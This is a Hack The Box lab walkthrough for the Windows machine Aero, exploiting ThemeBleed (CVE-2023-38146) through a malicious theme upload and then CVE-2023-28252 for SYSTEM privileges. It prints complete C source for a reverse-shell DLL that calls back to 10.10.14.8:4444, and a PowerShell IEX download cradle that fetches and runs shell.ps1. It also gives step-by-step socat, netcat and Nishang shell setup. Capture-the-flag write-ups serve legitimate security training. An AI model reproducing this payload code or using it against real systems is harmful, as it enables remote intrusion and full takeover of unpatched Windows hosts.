Hack The Box: Aero

What will you learn? Aero is a medium-rated Windows machine featuring two recent CVEs: CVE-2023-38146 (ThemeBleed), a flaw in how Windows loads theme files, and CVE-2023-28252, an elevation-of-privilege bug in the Common Log File System (CLFS) driver. Initial access comes from uploading a malicious theme built with a ThemeBleed proof-of-concept (PoC): the target fetches and loads our DLL and hands us a reverse shell. From that foothold we escalate to NT AUTHORITY\SYSTEM with a public CVE-2023-28252 exploit.

Let’s start enumerating the box:

The scan finds a single open port, 80/tcp, serving Microsoft IIS httpd 10.0.

Browsing to the site lands on a fairly plain page with an upload form at the bottom. The obvious first test is whether the upload is filtered: an unrestricted upload to an IIS server could let us drop a webshell or a reverse-shell payload.

Kali ships a set of ready-made webshells under /usr/share/webshells. Given IIS, the ASP and ASPX ones are the relevant choice; PHP would only matter if the site turns out to have a PHP backend, which is worth a secondary check.

Searching for ‘Aero Theme Hub’ leads to CVE-2023-38146, known as ThemeBleed, with a public PoC at https://github.com/Jnnshschl/CVE-2023-38146 . The tooling we will actually use is the ThemeBleed repo, cloned with git clone https://github.com/exploits-forsale/themebleed.git ; its README explains how to configure the exploit, and the site’s theme upload is our delivery mechanism against this Windows 11 theme hub.

The DLL we serve as the final stage must export a function named VerifyThemeVersion; that is the export the vulnerable theme loader calls, so our code runs inside it. The remaining parameters are described in the repo’s README. As a prerequisite, install the cross-compiler with apt-get install mingw-w64. For the shell itself we start from the windows.c reverse shell in this repo: https://github.com/izenynn/c-reverse-shell/blob/main/windows.c

The windows.c reverse shell needs heavy editing; the trimmed-down version used here, with the stock main() turned into a ReverseShell function, is shown below:

Then we add the ThemeBleed entry point, using the required export name VerifyThemeVersion, which simply calls ReverseShell with our IP and port.

Now we use mingw to cross-compile the C code into a DLL that the ThemeBleed server will serve later to get a reverse shell connection.
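The DLL described above, as an added example that is not the writeup’s own code nor code from the ThemeBleed or c-reverse-shell repos. It assumes the callback address 10.10.14.8:4444 used later in this writeup, that the loader only needs an export with the exact name VerifyThemeVersion (an int function taking no arguments is assumed here), and that the file is cross-compiled with mingw-w64 and dropped into the theme’s Data folder as stage_3. The callback parser is portable and can be checked off-box; the Winsock reverse shell is compiled only on Windows.

```c
/* stage_3.c - ThemeBleed (CVE-2023-38146) payload DLL. Added example, not the
 * writeup's or any repo's code.
 *
 * Build on Kali (assumption: mingw-w64 installed as described above):
 *   x86_64-w64-mingw32-gcc -shared -o stage_3.dll stage_3.c -lws2_32
 * then copy stage_3.dll over Data\stage_3 in the generated theme directory.
 */
#include <stdlib.h>
#include <string.h>

/* Assumption: attacker listener from this writeup (Kali VPN IP, netcat on 4444).
 * Only a dotted-quad IP is supported because inet_addr() is used below. */
#define CALLBACK "10.10.14.8:4444"

static char host_buf[64];   /* scratch buffer for the parsed host */

/* Split "host:port" into host (copied to out when out != NULL) and port.
 * Returns the port (1..65535) on success, -1 on a malformed spec so a typo in
 * CALLBACK fails here instead of producing a silent connect() to nowhere. */
int parse_callback(const char *spec, char *out, size_t outlen)
{
    const char *colon = strrchr(spec, ':');
    if (colon == NULL || colon == spec)          /* no ':' or empty host */
        return -1;
    char *end;
    unsigned long port = strtoul(colon + 1, &end, 10);
    if (colon[1] == '\0' || *end != '\0' || port == 0 || port > 65535)
        return -1;                               /* empty, trailing junk, out of range */
    size_t hostlen = (size_t)(colon - spec);
    if (out != NULL) {
        if (hostlen >= outlen)
            return -1;
        memcpy(out, spec, hostlen);
        out[hostlen] = '\0';
    }
    return (int)port;
}

#ifdef _WIN32
#include <winsock2.h>   /* must precede windows.h */
#include <windows.h>

/* Classic Winsock reverse shell: connect back, then start cmd.exe with the
 * socket as its stdin/stdout/stderr. WSASocket is used instead of socket()
 * so the handle is inheritable by the child process. */
static void reverse_shell(const char *host, unsigned short port)
{
    WSADATA wsa;
    if (WSAStartup(MAKEWORD(2, 2), &wsa) != 0)
        return;
    SOCKET s = WSASocketA(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
    if (s == INVALID_SOCKET)
        return;

    struct sockaddr_in sa;
    memset(&sa, 0, sizeof sa);
    sa.sin_family = AF_INET;
    sa.sin_port = htons(port);
    sa.sin_addr.s_addr = inet_addr(host);
    if (connect(s, (struct sockaddr *)&sa, sizeof sa) != 0) {
        closesocket(s);
        return;
    }

    STARTUPINFOA si;
    PROCESS_INFORMATION pi;
    memset(&si, 0, sizeof si);
    si.cb = sizeof si;
    si.dwFlags = STARTF_USESTDHANDLES;
    si.hStdInput = si.hStdOutput = si.hStdError = (HANDLE)s;
    char cmd[] = "cmd.exe";
    if (CreateProcessA(NULL, cmd, NULL, NULL, TRUE, CREATE_NO_WINDOW,
                       NULL, NULL, &si, &pi)) {
        CloseHandle(pi.hThread);
        CloseHandle(pi.hProcess);
    }
    closesocket(s);   /* cmd.exe keeps its inherited copy of the socket */
}

/* The export the theme loader calls once it has fetched this DLL over SMB.
 * The name must match exactly; the prototype is an assumption. */
__declspec(dllexport) int VerifyThemeVersion(void)
{
    int port = parse_callback(CALLBACK, host_buf, sizeof host_buf);
    if (port > 0)
        reverse_shell(host_buf, (unsigned short)port);
    return 0;
}

BOOL WINAPI DllMain(HINSTANCE inst, DWORD reason, LPVOID reserved)
{
    (void)inst; (void)reason; (void)reserved;
    return TRUE;
}
#endif
```

VerifyThemeVersion returns immediately after spawning cmd.exe rather than waiting on it, so the theme loader is not left hanging while the shell is in use; the child process keeps the socket alive on its own.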

Now we can run the actual ThemeBleed server (an SMB server) from the release build in the exploit repo. It has to run on a Windows VM of our own with antivirus disabled, since the tooling will otherwise be flagged: https://github.com/exploits-forsale/themebleed/releases/tag/v1

Serve the release with python3 -m http.server 80 on Kali and fetch it on the Windows VM, either through the browser or with any LOLBAS download method.

Once the file is across, stop and disable the ‘Server’ (LanmanServer) service on the Windows VM and reboot it. The ThemeBleed server needs to bind port 445, and the built-in SMB server already holds that port.

After the reboot, go to the directory containing ThemeBleed.exe and generate a theme that points back at our attacker address: .\ThemeBleed.exe make_theme 10.10.14.8 exploit.theme

Next, in the Data folder, delete the shipped stage_3 and copy in the DLL we compiled, renamed to stage_3 (no extension) so the server picks it up.

With the theme created, start the ThemeBleed server using .\ThemeBleed.exe server

Now copy the exploit.theme file over to the Kali Linux machine.

The theme points at 10.10.14.8, which is Kali’s VPN address, but the ThemeBleed server is listening on the Windows VM. So on Kali we run socat to accept connections on port 445 and forward them to port 445 on the Windows VM; the two VMs need to be on a bridged network for that to work. We also start a netcat listener on port 4444 for the shell.

Now we upload exploit.theme through the target’s upload form and wait for the connection back.

Keep trying until it works; it took a while for me and multiple attempts. I even tried stopping the server and starting it again. Then the server starts logging activity and a reverse shell connection comes back to our netcat listener.

We now have our initial foothold and can read the user.txt flag.

In the user’s Documents folder there are two artifacts: a PDF hinting at CVE-2023-28252 and a Watchdog.ps1 script. To read the PDF we can base64-encode it in PowerShell and carry the text back to Kali.

Enter: $b64 = [Convert]::ToBase64String([IO.File]::ReadAllBytes("CVE-2023-28252_Summary.pdf")) and then print it by calling $b64. Copy the output.

Paste it into a file on Kali, decode it from base64 into a .pdf file, and the document opens normally.

The privilege escalation uses a public exploit for CVE-2023-28252: https://github.com/fortra/CVE-2023-28252 . Clone it with git clone https://github.com/fortra/CVE-2023-28252.git ; it is a Visual Studio project, so we open it there. Packing it into a tar file makes it easier to copy to the Windows VM we used earlier; 7-Zip can extract the tarball on Windows.

Host it on the Python web server again and pull it over to the Windows VM. Install 7-Zip and Microsoft Visual Studio (the IDE, not Visual Studio Code). Open the .sln file, switch the build configuration from Debug to Release, and go to the source files.

Use Ctrl+F to find the system( call: the PoC spawns notepad as its proof that code runs as SYSTEM. We replace that with a PowerShell command that fetches and runs our reverse shell instead.

Then rebuild the solution. If the build complains about missing tooling, install the build tools from https://visualstudio.microsoft.com/downloads/#build-tools-for-visual-studio-2019 or use Project > Retarget Solution to switch to the toolset you have installed.
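The replacement for the PoC’s notepad call, as an added example that is not fortra’s code or the writeup’s. It assumes the stager is served from the Kali web root as http://10.10.14.8/shell.ps1 (address and file name from this writeup) and that the exploit reaches its system( call while already running under the SYSTEM token it obtained.

```c
/* Added example: what goes in place of the PoC's system("notepad.exe").
 * Not fortra's code. Assumed host and script name are the ones used in this
 * writeup; change them to match the attacker web server. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

static char stager_buf[512];   /* scratch buffer for the built command line */

/* Build the PowerShell download cradle. -WindowStyle Hidden avoids a console
 * popping on the target, -ExecutionPolicy Bypass makes the script run even
 * under a restricted policy, and the single-quoted URL keeps cmd.exe and
 * PowerShell quoting from fighting each other. Returns the length written or
 * -1 if the buffer is too small (the cradle must never be truncated). */
int build_stager_cmd(char *out, size_t outlen, const char *host, const char *script)
{
    int n = snprintf(out, outlen,
        "powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden "
        "-Command \"IEX(New-Object Net.WebClient).DownloadString('http://%s/%s')\"",
        host, script);
    if (n < 0 || (size_t)n >= outlen)
        return -1;
    return n;
}

/* Call site that replaces system("notepad.exe") in the exploit. Because the
 * exploit is already running with the SYSTEM token at this point, the child
 * PowerShell (and the reverse shell it starts) inherits it. system() blocks
 * until that PowerShell session exits, which is fine for an interactive shell. */
void spawn_system_shell(void)
{
    if (build_stager_cmd(stager_buf, sizeof stager_buf, "10.10.14.8", "shell.ps1") > 0)
        system(stager_buf);
}
```

Whatever shell.ps1 contains, it must actually invoke its reverse-shell function at the end of the file: IEX of a script that only defines a function (as Nishang’s Invoke-PowerShellTcp.ps1 does by default) returns without connecting back.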

Move the compiled exploit to the Kali machine with netcat or any other transfer method. Then copy a PowerShell reverse shell from /usr/share/nishang (the Shells/Invoke-PowerShellTcp.ps1 script, which we will invoke as a one-liner) and save it as shell.ps1.

Edit shell.ps1 to use our IP and the port a second netcat listener will wait on. Note that pulling the script in with IEX only defines the Invoke-PowerShellTcp function; a line that actually calls it in reverse mode with that IP and port has to be appended at the end of the file, or nothing connects back.

Host the exploit binary and shell.ps1 on the Kali web server so the target can fetch them with curl.

On the target, curl the exploit over, run it, and a connection should arrive at the netcat listener. I ended up switching my shell.ps1 payload to: https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3

The reverse shell listener receives a connection as NT AUTHORITY\SYSTEM. We have successfully rooted the box.
